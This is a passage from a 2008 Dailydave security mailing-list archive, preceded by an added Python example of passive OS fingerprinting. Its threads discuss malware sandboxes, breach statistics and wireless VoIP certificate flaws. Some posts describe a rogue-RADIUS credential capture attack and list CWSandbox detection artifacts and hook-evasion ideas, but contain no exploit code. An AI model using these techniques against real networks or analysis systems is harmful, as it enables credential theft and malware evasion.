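As an added illustration of the "Bayesian classifier" hammer applied to the problem just described (example code written for this archive, not code from the post or from CANVAS), the snippet below scores each OS hypothesis against passively observed SYN header features with a likelihood that marginalises over what the path may have done to the packet: an unknown number of TTL decrements and a middlebox that may have rewritten the window. The signature table, hop prior and noise rates are constructed values assumed for the example.

```python
"""Bayesian OS classification from passively observed SYN header features.

Added example for the "bag of hammers" discussion above: rather than an exact
signature lookup, each OS hypothesis gets a likelihood that marginalises over
what the path may have done to the packet (an unknown number of TTL
decrements, a middlebox that rewrites the window). The signature table, hop
prior and noise rates below are constructed for illustration, not taken from
any real fingerprinting tool.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Signature:
    os: str
    initial_ttl: int   # TTL the stack puts on the wire
    window: int        # initial TCP window advertised on the SYN
    df: bool           # Don't-Fragment bit set on the SYN


# Constructed sample signatures (hypothetical, not a real database).
SIGNATURES = (
    Signature("Linux", 64, 5840, True),
    Signature("FreeBSD", 64, 65535, True),
    Signature("Windows", 128, 65535, True),
)

MAX_HOPS = 30            # flat prior over 1..MAX_HOPS routers on the path
P_WINDOW_REWRITE = 0.10  # chance some device rewrote the window (assumed)
P_DF_FLIP = 0.01         # chance the DF bit was altered or misread (assumed)
EPSILON = 1e-6           # floor so no hypothesis is ruled out absolutely
WINDOW_SPACE = 65536.0   # a rewritten window is treated as uniform over 16 bits


def ttl_likelihood(sig, observed_ttl):
    """P(observed TTL | OS). The packet must have crossed
    h = initial_ttl - observed_ttl routers, and h is only plausible
    inside the prior's support; outside it we keep a tiny floor."""
    hops = sig.initial_ttl - observed_ttl
    if 1 <= hops <= MAX_HOPS:
        return 1.0 / MAX_HOPS
    return EPSILON


def window_likelihood(sig, observed_window):
    """P(observed window | OS): the window is either untouched, in which
    case it must equal the signature, or rewritten to an arbitrary value."""
    rewritten = P_WINDOW_REWRITE / WINDOW_SPACE
    if observed_window == sig.window:
        return (1.0 - P_WINDOW_REWRITE) + rewritten
    return rewritten


def df_likelihood(sig, observed_df):
    """P(observed DF | OS) with a small flip probability."""
    return (1.0 - P_DF_FLIP) if observed_df == sig.df else P_DF_FLIP


def classify(observed_ttl, observed_window, observed_df, signatures=SIGNATURES):
    """Posterior P(OS | features) under a flat prior over the signatures.
    Always sums to one, and never hits a zero because of the floors."""
    scores = {
        sig.os: (ttl_likelihood(sig, observed_ttl)
                 * window_likelihood(sig, observed_window)
                 * df_likelihood(sig, observed_df))
        for sig in signatures
    }
    total = sum(scores.values())
    return {name: score / total for name, score in scores.items()}


def best_guess(observed_ttl, observed_window, observed_df):
    """Most probable OS and its posterior; a value near 0.5 means the
    features could not separate two candidates (e.g. rewritten window)."""
    post = classify(observed_ttl, observed_window, observed_df)
    name = max(post, key=post.get)
    return name, post[name]


if __name__ == "__main__":
    # Constructed observations, all as if seen about 12-14 hops away.
    for obs in ((52, 5840, True),     # Linux-like
                (116, 65535, True),   # Windows-like
                (50, 65535, True),    # FreeBSD-like
                (52, 16384, True)):   # window rewritten: Linux/FreeBSD tie
        print(obs, best_guess(*obs))
```

Where a middlebox has rewritten the window, the last case degrades to an honest tie between the two TTL-compatible stacks instead of a failed lookup, which is the ambiguity the post describes when port 80 and port 25 may not even be the same host.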
:>

-dave

[1] http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-arkin.pdf
[2] http://packetstormsecurity.org/UNIX/audit/firewalk/
[3] http://www.springerlink.com/content/j6dnbdnrjxdqbrk8/
[4] http://www.mit.edu/~rbeverly/papers/tcpclass-pam04.pdf
[5] http://synscan.sourceforge.net/taleck-synscan-2004.pdf
[6] http://www.usenix.org/event/woot07/tech/full_papers/greenwald/greenwald_html/

From demottja at msu.edu Sun Feb 17 13:05:54 2008
From: demottja at msu.edu (Jared DeMott)
Date: Sun, 17 Feb 2008 13:05:54 -0500
Subject: [Dailydave] NematodeMS
In-Reply-To: <47B6ED46.8090306@immunityinc.com>
References: <47B6ED46.8090306@immunityinc.com>
Message-ID: <47B87782.9060302@msu.edu>

Dave Aitel wrote:
> http://technology.newscientist.com/article/dn13318-friendly-worms-could-spread-software-fixes.html
>
> I have to admit that it's cool when Microsoft builds Nematodes. :>
>

Nice, that would be the final blow for net IDS in the corporate environment. ("Don't worry Dave, that scanning/exploit is friendly fire.")

As for .edu, let's put it this way, at a recent talk the speaker made the point that .edus are weaker than normal (that was a shock ... not.), and then their fight against having to respond to police type taps due to lack of funds .... gee, I wonder which nets will the Chinese continue to target for launch points?

Happy Sunday!
Jared

> -dave

From rthieme at thiemeworks.com Sun Feb 17 15:24:12 2008
From: rthieme at thiemeworks.com (Richard Thieme)
Date: Sun, 17 Feb 2008 14:24:12 -0600
Subject: [Dailydave] You are in a maze of twisty little passages, all alike
In-Reply-To: <47B85EC3.2050101@immunityinc.com>
References: <47B85EC3.2050101@immunityinc.com>
Message-ID: <47B897EC.5080000@thiemeworks.com>

This is a fabulous post. Thanks Dave. I understand that the authors of Leather Goddesses of Phobos also drew on their own experiences while working at Sandoz as CIA contract employees in the early days of computing ...

Dave Aitel wrote:
> Geek culture has its own literature. Adventure, the text game, is one of
> these canons, as is Zork and all the Infocom games [1]. For a lot of
> us, Adventure was the first game we ever played. It turns out that
> someone went and did a big documentary on them, and then gave a talk
> about it at Shmoocon. He found out that the Adventure game was written
> by a caver, and based on a real cave in Kentucky. And then he took a
> video camera and shot some footage down in the original cave, where the
> birdcage room is, near the twisty little passages, all alike.
>
> During his talk, he shows you some of the stills of the cave, and as he
> goes through them, if you've played enough Adventure, your brain can
> reconstruct the geography. From just the experience of playing a text
> game, you feel like you know your way around the cave as he goes through
> the photos. It's uncanny. You've never been there, or even seen
> drawings, but your brain tells you that you recognize the places. Yes,
> here's the hall of the mountain king, here's the birdcage room, here's
> the stream you go down to find the cave where the lamp sits. Anyways, he
> has his site up at takelamp.com.
> It's worth a look-see. Sometimes the
> talks you go to in a conference that are not technical are the ones you
> remember.
>
> -dave
> [1] http://www.xs4all.nl/~pot/infocom/

From dan at geer.org Mon Feb 18 07:42:20 2008
From: dan at geer.org (dan at geer.org)
Date: Mon, 18 Feb 2008 07:42:20 -0500
Subject: [Dailydave] NematodeMS
In-Reply-To: Your message of "Sun, 17 Feb 2008 13:05:54 EST." <47B87782.9060302@msu.edu>
Message-ID: <20080218124220.B5FEE33D88@absinthe.tinho.net>

Jared DeMott writes:
-+------------------
 | As for .edu, let's put it this way, at a recent talk
 | the speaker made the point that .edus are weaker than
 | normal (that was a shock ... not.), and then their
 | fight against having to respond to police type taps due
 | to lack of funds .... gee, I wonder which nets will the
 | Chinese continue to target for launch points?
 |

In looking at the last 500 reports from the Identity Theft Resource Center, and ordering them by my own little classification, I get the following differentiation of how the losses of records occur. Don't take this as Gospel since it has not-yet-understood artifacts of what does get reported and what does not, but I think it does show something you will find of interest. I am working on this, so take with a grain of salt...
business
----------------------
insider      68.1%
laptop       17.1%
exposed      11.1%
hacking       1.3%
missing       1.0%
breakin       0.8%
unknown       0.5%
found         0.0%
paper         0.0%
CD stolen     0.0%
hacker        0.0%
email         0.0%
skimming      0.0%

bank/finance
----------------------
insider      98.2%
laptop        0.9%
paper         0.5%
exposed       0.2%
hacking       0.1%
found         0.0%
missing       0.0%
CD stolen     0.0%
breakin       0.0%
unknown       0.0%
hacker        0.0%
email         0.0%
skimming      0.0%

gov/mil
----------------------
missing      33.2%
laptop       31.1%
exposed      10.6%
paper         9.6%
hacking       9.4%
insider       3.1%
CD stolen     1.9%
breakin       1.2%
hacker        0.1%
found         0.0%
unknown       0.0%
email         0.0%
skimming      0.0%

med/health
----------------------
missing      76.6%
laptop       15.2%
hacking       2.5%
exposed       2.0%
insider       1.7%
CD stolen     1.5%
paper         0.3%
hacker        0.2%
found         0.0%
breakin       0.0%
unknown       0.0%
email         0.0%
skimming      0.0%

educational
----------------------
exposed      42.3%
hacking      39.6%
laptop       12.1%
CD stolen     4.0%
missing       1.2%
insider       0.7%
breakin       0.1%
paper         0.1%
unknown       0.0%
hacker        0.0%
found         0.0%
email         0.0%
skimming      0.0%

--dan

From pmelson at gmail.com Mon Feb 18 10:14:52 2008
From: pmelson at gmail.com (Paul Melson)
Date: Mon, 18 Feb 2008 10:14:52 -0500
Subject: [Dailydave] NematodeMS
In-Reply-To: <47B87782.9060302@msu.edu>
References: <47B6ED46.8090306@immunityinc.com> <47B87782.9060302@msu.edu>
Message-ID: <007d01c87241$036831e0$4d00300a@ad.priorityhealth.com>

> Nice, that would be the final blow for net IDS in the corporate environment. ("Don't worry
> Dave, that scanning/exploit is friendly fire.")

I would think most corporate networks of any size would continue to use WSUS or whatever because of the degree of control it offers them. Today I am interested in machines requesting patches directly from Microsoft because it means they're not part of the normal patch management cycle and could signify other problems as well (rogue machine, off the domain, VM, etc.). Tomorrow will be the same, and if the new patch download traffic gets blocked by the IDS because it looks too slimy, oh well.
PaulM

From jericho at attrition.org Mon Feb 18 13:26:46 2008
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 18 Feb 2008 18:26:46 +0000 (UTC)
Subject: [Dailydave] You are in a maze of twisty little passages, all alike
In-Reply-To: <47B85EC3.2050101@immunityinc.com>
References: <47B85EC3.2050101@immunityinc.com>
Message-ID:

: During his talk, he shows you some of the stills of the cave, and as he
: goes through them, if you've played enough Adventure, your brain can
: reconstruct the geography. From just the experience of playing a text
: game, you feel like you know your way around the cave as he goes through
: the photos. It's uncanny. You've never been there, or even seen
: drawings, but your brain tells you that you recognize the places. Yes,
: here's the hall of the mountain king, here's the birdcage room, here's
: the stream you go down to find the cave where the lamp sits. Anyways, he
: has his site up at takelamp.com. It's worth a look-see.

This is excellent, glad you shared this.

: Sometimes the talks you go to in a conference that are not technical are
: the ones you remember.

Too bad most conference organizers (or the people responsible for picking presentations) don't realize this. Rather than accept non-technical but interesting (even security related) talks, the last few years they have tended to pick multiple presentations on the same topics. One year at BlackHat had several talks on XSS and SQL injection for example. Co-workers who sat in on those talks said they were hardly new or interesting.

From redhowlingwolves at nc.rr.com Tue Feb 19 01:41:42 2008
From: redhowlingwolves at nc.rr.com (scott)
Date: Tue, 19 Feb 2008 01:41:42 -0500
Subject: [Dailydave] You are in a maze of twisty little passages, all alike
In-Reply-To:
References: <47B85EC3.2050101@immunityinc.com> <47BA6429.2090002@nc.rr.com>
Message-ID: <47BA7A26.2070509@nc.rr.com>

security curmudgeon wrote:
> : Maybe everyone needs a fresh 'con.
> : Try CarolinaCon.
> : It just might be worth your time?
> :
> : It is just an upstart, but there are plenty of talented people in NC.
>
> if they pay for speakers/presenters maybe. if not, while i work for the
> company i do, they won't send me there since two of our guys live in NC =(
>

That's a bummer because I believe this 'con should take off! Maybe not at its current location (unless you happen to be into ACC basketball, which is another matter). RTP is a hotbed of techs. They deserve a little respect. Just a thought.

Scott

From dave at immunityinc.com Tue Feb 19 08:05:42 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Tue, 19 Feb 2008 08:05:42 -0500
Subject: [Dailydave] jordan posted this semi-anonymously
Message-ID: <47BAD426.1020901@immunityinc.com>

Dave,

I think that you're more referring to Hidden Markov Models, rather than Markov Chains. Markov Chains are typically only mentioned in theoretical discussions, HMMs are used in real tools. I've long wondered why I haven't seen any security tools that use these powerful tools (or Dynamic Bayes Nets; even more powerful, easier to inject domain knowledge).

Artificial Neural Nets (ANNs) are often the wrong tool/hammer for problems involving time-series data, and are better for classification when you just have a bag of features. Trying to represent things like "this happened before this", or "these things happened in this order" is messy, and while there are things like recurrent ANNs that handle temporal data, they are incredibly difficult to design, and usually exhibit poor performance.
ANNs are also horribly un-Bayesian in most applications that I've seen, and so they don't give any sense of the confidence in their hypotheses. There are good methods for getting error-bars, and the theory of Bayesian Neural Networks is fairly well understood [1], but Bayesian ANNs don't seem to be used in practice, from my experience. I think that the math behind them seems intimidating, and so they are avoided. Lastly, ANNs with more than a few hidden layers and a few hundred nodes have been practically infeasible to train until the last year or two, based on breakthroughs by Hinton [2].

HMMs and DBNs are much more powerful for the problems that these applications seem to be trying to solve. Then again I'm a machine learning researcher, not a security researcher, so I may be way out of line even proffering an opinion on this issue. Also, I consider myself a mathematician, and my skull is still intact.

Jordan

[1] http://www.inference.phy.cam.ac.uk/mackay/Bayes_FAQ.html
[2] Hinton, G. E., Osindero, S. and Teh, Y. (2006), A fast learning algorithm for deep belief nets. Neural Computation, 18, pp 1527-1554.

From adriel at netragard.com Wed Feb 20 20:03:01 2008
From: adriel at netragard.com (Adriel Desautels)
Date: Wed, 20 Feb 2008 20:03:01 -0500
Subject: [Dailydave] Google Robot and Black ICE
Message-ID: <47BCCDC5.3030009@netragard.com>

Greetings,
I was just looking over some IDS events and noticed that Google keeps looking for blackice.ini on one of our web servers. Does anyone have any idea as to why Google would be doing this? This happens on average 3-5 times a day. Nothing critical, just curious. Every time Google tries the request is denied.
Event:
------
Blocked access to : /blackice.ini
Reason : URL file extension is restricted by policy
SOURCE IP : crawl-66-249-73-113.googlebot.com
Detected On : Web Server Logs, NIDS, Firewall Logs

--

Regards,
Adriel T. Desautels
Chief Technology Officer
Netragard, LLC.
Office : 617-934-0269
Mobile : 617-633-3821
http://www.linkedin.com/pub/1/118/a45

Join the Netragard, LLC. Linked In Group:
http://www.linkedin.com/e/gis/48683/0B98E1705142

---------------------------------------------------------------
Netragard, LLC - http://www.netragard.com - "We make IT Safe"
Penetration Testing, Vulnerability Assessments, Website Security

From lmh at info-pull.com Tue Feb 19 15:59:14 2008
From: lmh at info-pull.com (Lance M. Havok)
Date: Tue, 19 Feb 2008 21:59:14 +0100
Subject: [Dailydave] Farewell & Castro
Message-ID:

Now Castro is finally dead, and there's no reason for me to stay here any longer. Consider this a farewell, it seems the security and IT industry itself is so plagued with parasites and misers that it doesn't qualify as a fun hobby anymore.

There's still a question left unanswered: What is more sad, someone who excels at information security as a hobby, or someone pretending to build a career from it without the skillset and personal qualifications it requires, being far less talented and qualified than the hobbyist? Like Hemingway would say, 'you either have it, or you don't have it at all'. Don't even try.

Oh... I heard some illegal aliens have said they have never seen me coding an exploit or (...) shellcode! Hypocrisy or they simply need to take their heads out of their filthy butts? Whatever, learn English (or British?).
'And he sent you on a mission, saying, 'Go and completely destroy those wicked people, the Amalekites; make war on them until you have wiped them out.' Samuel 15:17-19

Like it couldn't happen elsewhere...

I'll be releasing an old OpenBSD local + remote exploit (this part might not be added if time is scarce, I find computers quite unappealing nowadays ;-) ) with a personal touch. Some people of our fan club know it as jizz.c, others call it 'shadow-n-omen.c' (the jealous poser omen, not part of the Bible yet). I like the former.

Hopefully my always loved & lovely Dave will let my very last words through and we can all have something to talk shite! (not to be confused with shiites).

Signed: I, who can't code an exploit even though my split personality would say otherwise. Now AFK for the rest of his life. Talent, skill-set and humor to be invested elsewhere, obviously.

From chris.kuethe at gmail.com Thu Feb 21 01:24:12 2008
From: chris.kuethe at gmail.com (Chris Kuethe)
Date: Wed, 20 Feb 2008 22:24:12 -0800
Subject: [Dailydave] Google Robot and Black ICE
In-Reply-To: <47BCCDC5.3030009@netragard.com>
References: <47BCCDC5.3030009@netragard.com>
Message-ID: <91981b3e0802202224j4497e1fdnf4082642f481694b@mail.gmail.com>

On Wed, Feb 20, 2008 at 5:03 PM, Adriel Desautels wrote:
> Greetings,
> I was just looking over some IDS events and noticed that Google keeps
> looking for blackice.ini on one of our web servers. Does anyone have any
> idea as to why Google would be doing this? This happens on average 3-5
> times a day. Nothing critical, just curious. Every time Google tries the
> request is denied.

Maybe at one time there was a file called /blackice.ini on your server and it got indexed? Were you ever on a virtual host with someone who may have had a /blackice.ini? Maybe some asshats have a link pointing to this nonexistent file and googlebot says "hm, let's see what this file that all these people are linking to is all about"?
I know I still get crawled for urls that aren't on my boxen any more... but not 3-5 times a day. Whois and traceroute suggest that if someone's pretending to be googlebot to try mine your site, they're at least putting some effort into it...

CK

--
GDB has a 'break' feature; why doesn't it have 'fix' too?

From kf_lists at digitalmunition.com Thu Feb 21 00:34:55 2008
From: kf_lists at digitalmunition.com (Kevin Finisterre (lists))
Date: Thu, 21 Feb 2008 00:34:55 -0500
Subject: [Dailydave] Google Robot and Black ICE
In-Reply-To: <47BCCDC5.3030009@netragard.com>
References: <47BCCDC5.3030009@netragard.com>
Message-ID: <9AE871DC-1308-48EE-B870-51F720F2CD03@digitalmunition.com>

My friend have you forgotten our old Black Ice exploit? God... I had to search my spool for the lulz as they say. maybe this will refresh your memory:

"I would like to see a panel discussion about the disclosure of lame bugs; I am probably going to submit a white paper on it to an upcoming conference. We do not get too concerned about local Window's BO, unless they are in IE, Outlook, etc that would allow for a network vector for compromise. On a system that is more commonly deployed as a multi-user system (unix,linux), of course we consider a local priv escalation serious and provide protection in our host based products. We have about 15,000 corporate customers, including most of the fortune 1000, and in my six years at ISS not a single one has asked me for our products to detect or stop a local windows BO (besides IE or Outlook). I am responsible for every signature in all our products."

can you name that quote? heh

-KF

On Feb 20, 2008, at 8:03 PM, Adriel Desautels wrote:
> Greetings,
> I was just looking over some IDS events and noticed that Google
> keeps looking for blackice.ini on one of our web servers. Does
> anyone have any idea as to why Google would be doing this? This
> happens on average 3-5 times a day. Nothing critical, just curious.
> Every time Google tries the request is denied.
> > Event: > ------ > Blocked access to : /blackice.ini > Reason : URL file extension is restricted by policy > SOURCE IP : crawl-66-249-73-113.googlebot.com > Detected On : Web Server Logs, NIDS, Firewall Logs > > > > > -- > > Regards, > Adriel T. Desautels > Chief Technology Officer > Netragard, LLC. > Office : 617-934-0269 > Mobile : 617-633-3821 > http://www.linkedin.com/pub/1/118/a45 > > Join the Netragard, LLC. Linked In Group: > http://www.linkedin.com/e/gis/48683/0B98E1705142 > > --------------------------------------------------------------- > Netragard, LLC - http://www.netragard.com - "We make IT Safe" > Penetration Testing, Vulnerability Assessments, Website Security > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20080221/dcf13de7/attachment.htm From dave at immunityinc.com Thu Feb 21 07:54:05 2008 From: dave at immunityinc.com (Dave Aitel) Date: Thu, 21 Feb 2008 07:54:05 -0500 Subject: [Dailydave] VPC Message-ID: <47BD746D.5040201@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 So in the Microsoft/Immunity/iSec Defend the Flag class here at BlackHat Federal, I learned the hard way that VPC moves memory all around and your previously great universal addresses don't work. So you'll end up trying really hard to find an address that defeats SafeSEH on 2003 SP0 in 15 minutes or less. Also I notice there are a lot of companies doing automated Incident Response or malware analysis now. Zynamic's VxClass is obviously one of my favorites. HBGary has retooled Inspector into a tool ("Responder") that can read and analyze physical memory dumps. Mandiant has their new tool out. Norman had a softice-looking sandbox-like thing on display. 
There's another one called CWSandbox that has a free web form you can send exe's to. (They hook a bunch of things but I think you can escape the hooking by calling system calls directly?)

And let me also put it this way: If you have a source code analyzer product booth, and you don't let people write little C programs and have them analyzed, it's really annoying.

-dave

From george_ou at lanarchitect.net Thu Feb 21 07:09:33 2008
From: george_ou at lanarchitect.net (George Ou)
Date: Thu, 21 Feb 2008 04:09:33 -0800
Subject: [Dailydave] Cisco and Vocera wireless LAN VoIP devices don't check certificates
Message-ID: <000101c87482$9ee0c400$dca24c00$@net>

Looks like Vocera's wireless LAN VoIP communicators don't bother to cryptographically confirm the validity of a digital certificate because it's too much "processing overhead required". This is clearly stated in the Vocera documentation. I am also waiting for verification on Cisco's wireless VoIP handsets. I'm told they have the same design flaw.

That means you can basically put up your own bogus access point with a rogue RADIUS backend with your own self-signed digital certificate claiming it's the same as the certificate the client is used to seeing. Since the client never bothers to cryptographically check the signature, it thinks it's talking to the right server and it will send its hashed password or pin to the server, making it very easy to crack.
I have more details here:
http://blogs.zdnet.com/security/?p=896

George Ou

From demottja at msu.edu Thu Feb 21 10:01:04 2008
From: demottja at msu.edu (Jared DeMott)
Date: Thu, 21 Feb 2008 10:01:04 -0500
Subject: [Dailydave] VPC
In-Reply-To: <47BD746D.5040201@immunityinc.com>
References: <47BD746D.5040201@immunityinc.com>
Message-ID: <47BD9230.2090502@msu.edu>

Dave Aitel wrote:
> So in the Microsoft/Immunity/iSec Defend the Flag class here at BlackHat
> Federal, I learned the hard way that VPC moves memory all around and
> your previously great universal addresses don't work. So you'll end up
> trying really hard to find an address that defeats SafeSEH on 2003 SP0
> in 15 minutes or less.
>
> Also I notice there are a lot of companies doing automated Incident
> Response or malware analysis now.
>
> Zynamic's VxClass is obviously one of my favorites.
> HBGary has retooled Inspector into a tool ("Responder") that can read
> and analyze physical memory dumps.
> Mandiant has their new tool out.
> Norman had a softice-looking sandbox-like thing on display.
> There's another one called CWSandbox that has a free web form you can
> send exe's to.

Actually Norman and CW both have a web interface. However, I believe CW to be a bit better -- based on one case study of newer malware. I just did some research and wrote a paper/created slides for a talk I'm giving at a local west Michigan sec group. I put the slides up on my site if anyone would like to take a peek:
http://www.vdalabs.com/tools/malware.html

I'm relatively new to the malware scene, so I'd appreciate constructive feedback.
Cheers,
Jared

From george_ou at lanarchitect.net Thu Feb 21 16:19:10 2008
From: george_ou at lanarchitect.net (George Ou)
Date: Thu, 21 Feb 2008 13:19:10 -0800
Subject: [Dailydave] Cisco and Vocera wireless LAN VoIP devices don't check certificates
In-Reply-To: <47BD8A0F.8000901@hasborg.com>
References: <000101c87482$9ee0c400$dca24c00$@net> <47BD8A0F.8000901@hasborg.com>
Message-ID: <000c01c874cf$673a5eb0$35af1c10$@net>

Sure, if the client does not lock down the "server name" subject field in the certificate, and the certificate authority isn't locked down to an internal CA, then it's as good as wide open. The EAP clients are very hard to properly configure, unlike the typical web browser, which automatically compares the certificate subject field to the URL address.

This Vocera/Cisco case is much worse though, since no amount of care in the deployment is going to help you. The client makes zero effort to verify the certificate due to CPU resource limitations in these wireless embedded devices.

George

-----Original Message-----
From: Joshua Wright [mailto:jwright at hasborg.com]
Sent: Thursday, February 21, 2008 6:26 AM
To: George Ou
Cc: dailydave at lists.immunitysec.com
Subject: Re: [Dailydave] Cisco and Vocera wireless LAN VoIP devices don't check certificates

| That means you can basically put up your own bogus access point with a rogue
| RADIUS backend with your own self-signed digital certificate claiming it's
| the same as the certificate the client is used to seeing. Since the client
| never bothers to cryptographically check the signature, it thinks it's
| talking to the right server and it will send its hashed password or pin to
| the server making it very easy to crack.

Similarly, if you have a valid certificate for RADIUS from a trusted CA for any organization, you can impersonate other legitimate RADIUS servers and get access to inner EAP authentication credentials (MS-CHAP, PAP and CHAP, for example).
This was the premise for the talk I gave with Brad Antoniewicz at Shmoocon on Sunday. FreeRADIUS WPE (Wireless Pwnage Edition) simplifies this attack by customizing FreeRADIUS behavior and configuration:
http://www.willhackforsushi.com/FreeRADIUS_WPE.html

-Josh

From jwright at hasborg.com Thu Feb 21 09:26:23 2008
From: jwright at hasborg.com (Joshua Wright)
Date: Thu, 21 Feb 2008 09:26:23 -0500
Subject: [Dailydave] Cisco and Vocera wireless LAN VoIP devices don't check certificates
In-Reply-To: <000101c87482$9ee0c400$dca24c00$@net>
References: <000101c87482$9ee0c400$dca24c00$@net>
Message-ID: <47BD8A0F.8000901@hasborg.com>

| That means you can basically put up your own bogus access point with a rogue
| RADIUS backend with your own self-signed digital certificate claiming it's
| the same as the certificate the client is used to seeing. Since the client
| never bothers to cryptographically check the signature, it thinks it's
| talking to the right server and it will send its hashed password or pin to
| the server making it very easy to crack.
Similarly, if you have a valid certificate for RADIUS from a trusted CA for any organization, you can impersonate other legitimate RADIUS servers and get access to inner EAP authentication credentials (MS-CHAP, PAP and CHAP, for example).

This was the premise for the talk I gave with Brad Antoniewicz at Shmoocon on Sunday. FreeRADIUS WPE (Wireless Pwnage Edition) simplifies this attack by customizing FreeRADIUS behavior and configuration:
http://www.willhackforsushi.com/FreeRADIUS_WPE.html

-Josh

From thorsten.holz at gmail.com Thu Feb 21 10:51:24 2008
From: thorsten.holz at gmail.com (Thorsten Holz)
Date: Thu, 21 Feb 2008 16:51:24 +0100
Subject: [Dailydave] VPC
In-Reply-To: <47BD746D.5040201@immunityinc.com>
References: <47BD746D.5040201@immunityinc.com>
Message-ID: <5603eb730802210751w25526e4atc283a9eee19a6415@mail.gmail.com>

On Thu, Feb 21, 2008 at 1:54 PM, Dave Aitel wrote:
> There's another one called CWSandbox that has a free web form you can
> send exe's to.
You can either send a sample to or More info about the tool is available in an article () and an example report is

> (They hook a bunch of things but I think you can escape
> the hooking by calling system calls directly?)

But then you are not platform independent. CWSandbox was originally designed to automatically analyze the malware we capture with the help of honeypots (worms, bots, ...), but has evolved a lot since then.

Cheers,
Thorsten

From dr at kyx.net Fri Feb 22 05:39:30 2008
From: dr at kyx.net (Dragos Ruiu)
Date: Fri, 22 Feb 2008 02:39:30 -0800
Subject: [Dailydave] CanSecWest 2008 Mar 26-28
Message-ID: <200802220239.30889.dr@kyx.net>

CanSecWest 2008 Presentations

Snort 3.0 - Marty Roesch, Sourcefire
Cross-Site Scripting Vulnerabilities in Flash Authoring Tools - Rich Cannings, Google
Proprietary RFID Systems - Jan "starbug" Krissler and Karsten Nohl, CCC
Media Frenzy: Finding Bugs in Windows Media Software - Mark Dowd and John McDonald, IBM ISS
Targeted Attacks and Microsoft Office Malware - Rob Hensing, Microsoft
Virtually Secure - Oded Horovitz, VMWare
Malicious Cryptography - Frédéric Raynal and Eric Filiol, Sogeti/Cap-Gemini and ESAT
The Death of AV Defense in Depth: Revisiting Anti-Virus Software - Thierry Zoller and Sergio Alvarez, nRuns
VMWare Issues - Sun Bing, McAfee
Intrusion Detection Systems Correlation: a Weapon of Mass Investigation - Sebastien Tricaud and Pierre Chifflier, INL
Web Wreck-utation - Dan Hubbard and Stephan Chenette, WebSense
Secure programming with gcc and glibc - Marcel Holtmann, Intel
Mobitex network security - olleB, toolcrypt.org
Peach Fuzzing - Michael Eddington, Leviathan
Fuzz by Number - Charlie Miller, Independent Security Evaluators
Fuzzing WTF? What Fuzzing Was, Is And Never Will Be. - Frank Marcus and Mikko Varpiola, Wurldtech / Codenomicon
Vulnerabilities Die Hard - Kowsik Guruswamy, Mu
Hacking Windows Vista - Dan Griffin, JW Secure
ExeFilter: a new open-source framework for active content filtering - Philippe Lagadec, NATO/NC3A
VetNetSec: Security testing for Extremists - Eric Hacker, BT INS
w3af: A framework to own the web - Andres Riancho, Cybsec
A Unique Behavioral Science Approach to Threats, Extortion and Internal Computer Investigations - Scott K. Larson, Stroz Friedberg

-- 

2008 Dojos

Vulnerability Discovery Demystified - Mark Dowd and Justin Schuh
The Exploit Laboratory - Advanced Edition - Saumil Shah
Advanced Honeypot Tactics - Thorsten Holz
Mastering the network with Scapy - Philippe Biondi
Voice over IP (VoIP) Security - Nico Fischbach
Practical 802.11 WiFi (In)Security - Cédric Blancher
Advanced Linux Hardening - Andrea Barisani
Defend The Flag - Microsoft

-- 

2008 PWN 2 OWN

There will be three targets:

A MacBook Air, running the latest OSX, patched, typical configuration.
A Sony VAIO VGN-TZ37CNB, running Ubuntu, latest release.
A Fujitsu U810, running Vista, latest update.

The contest will be adjudicated by our impartial celebrity judge:

Ronald C. Dodge JR., Ph.D.
Lieutenant Colonel, Academy Professor
Associate Dean, Information and Education Technology, United States Military Academy

The victory conditions will be the contents of specific specially planted files on each system, to be extracted by winners. Hack them and you get to keep them, and any associated prizes for the exploits used, oh and the fame and glory. :-)

Browsers (I.E., Mozilla, Safari), Mail Clients (Outlook, Mail.app, Thunderbird), and IM clients (MSN, Adium, Pidgin, Skype all platforms) are all in scope.

More details and official rules soon.

cheers,
--dr

-- 
World Security Pros.
Cutting Edge Training, Tools, and Techniques
Vancouver, Canada March 25-28 - 2008 http://cansecwest.com
pgpkey http://dragos.com/ kyxpgp

From Thierry at Zoller.lu Fri Feb 22 05:12:08 2008
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Fri, 22 Feb 2008 11:12:08 +0100
Subject: [Dailydave] VPC
In-Reply-To: <47BD746D.5040201@immunityinc.com>
References: <47BD746D.5040201@immunityinc.com>
Message-ID: <753218234.20080222111208@Zoller.lu>

Dear Dave,

DA> There's another one called CWSandbox that has a free web form you can
DA> send exe's to. (They hook a bunch of things but I think you can escape
DA> the hooking by calling system calls directly?)

CWSandbox [1] uses Vmware (afaik)

cws_[pid]_mutex
cws_[pid]_event_data
cws_[pid]_event_result
cws_[pid]_mapping

290 hooked apis
10 hooked methods

[1] http://pferrie.tripod.com/papers/attacks2.ppt

-- 
http://secdev.zoller.lu
Thierry Zoller

From Thierry at Zoller.lu Fri Feb 22 05:15:31 2008
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Fri, 22 Feb 2008 11:15:31 +0100
Subject: [Dailydave] VPC
In-Reply-To: <47BD9230.2090502@msu.edu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu>
Message-ID: <759087508.20080222111531@Zoller.lu>

Dear Jared DeMott,

JD> Actually Norman and CW both have a web interface. However, I believe CW
JD> to be a bit better -- based on one case study of newer malware. I just
JD> did some research and wrote a paper/created slides for a talk I'm giving
JD> at a local west Michigan sec group. I put the slides up on my site if
JD> anyone would like to take a peek:
JD> http://www.vdalabs.com/tools/malware.html

Hint: There are better ones than CWsandbox,
- Joebox
- Anubis (qemu -> easy to detect)

-- 
http://secdev.zoller.lu
Thierry Zoller

From Thierry at Zoller.lu Fri Feb 22 09:34:58 2008
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Fri, 22 Feb 2008 15:34:58 +0100
Subject: [Dailydave] VPC
In-Reply-To: <759087508.20080222111531@Zoller.lu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu> <759087508.20080222111531@Zoller.lu>
Message-ID: <1929059158.20080222153458@Zoller.lu>

Dear All,

